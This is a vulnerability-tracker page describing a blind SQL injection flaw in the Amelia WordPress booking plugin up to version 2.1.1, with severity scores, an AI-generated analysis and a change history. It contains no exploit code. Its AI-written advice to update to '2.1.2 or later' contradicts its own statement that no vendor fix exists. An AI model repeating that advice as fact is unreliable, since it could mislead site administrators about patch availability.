Description
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ameliabooking Amelia ameliabooking allows Blind SQL Injection.This issue affects Amelia: from n/a through <= 2.1.1.
Published: 2026-04-08
Score: 7.6 High
EPSS: < 1% Very Low
KEV: No
Impact: Database Compromise via SQL Injection
Action: Immediate Patch
AI Analysis

Impact

This issue arises from improper neutralization of special elements used within an SQL command in the Amelia booking plugin. The vulnerable code processes user input without adequate escaping, enabling attackers to embed SQL fragments that are blindly executed by the database. The resulting blind SQL injection can allow an attacker to read, modify, or delete data, possibly leading to compromised site integrity and confidentiality.

Affected Systems

WordPress sites deployed with the Amelia booking plugin version 2.1.1 or earlier are vulnerable. Only the plugin layer is affected; the core WordPress installation itself is not directly impacted unless it relies on the plugin for critical functions.

Risk and Exploitability

The CVSS score of 7.6 signifies a high severity risk, and the EPSS score of less than 1% indicates a low likelihood of exploitation in the wild. The vulnerability is not listed in the CISA known exploited vulnerabilities catalog. Likely attack vectors are through any plugin form or API endpoint that accepts unchecked user input, with the attacker needing to infer the database response via blind techniques.

Generated by OpenCVE AI on April 10, 2026 at 19:39 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update the Amelia plugin to the latest version (e.g., 2.1.2 or later).
  • If an immediate update is not possible, remove the Amelia plugin from the site until a secure version is available.

Generated by OpenCVE AI on April 10, 2026 at 19:39 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Fri, 10 Apr 2026 18:15:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 7.6, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L'}

ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Wed, 08 Apr 2026 19:45:00 +0000

Type Values Removed Values Added
First Time appeared Ameliabooking
Ameliabooking amelia
Wordpress
Wordpress wordpress
Vendors & Products Ameliabooking
Ameliabooking amelia
Wordpress
Wordpress wordpress

Wed, 08 Apr 2026 08:45:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ameliabooking Amelia ameliabooking allows Blind SQL Injection.This issue affects Amelia: from n/a through <= 2.1.1.
Title WordPress Amelia plugin <= 2.1.1 - SQL Injection vulnerability
Weaknesses CWE-89
References

Subscriptions

Ameliabooking Amelia
Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-29T09:52:01.937Z

Reserved: 2026-04-07T10:47:37.759Z

Link: CVE-2026-39487

cve-icon Vulnrichment

Updated: 2026-04-10T18:09:35.678Z

cve-icon NVD

Status : Deferred

Published: 2026-04-08T09:16:23.533

Modified: 2026-04-24T18:08:35.440

Link: CVE-2026-39487

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-13T14:25:35Z

Weaknesses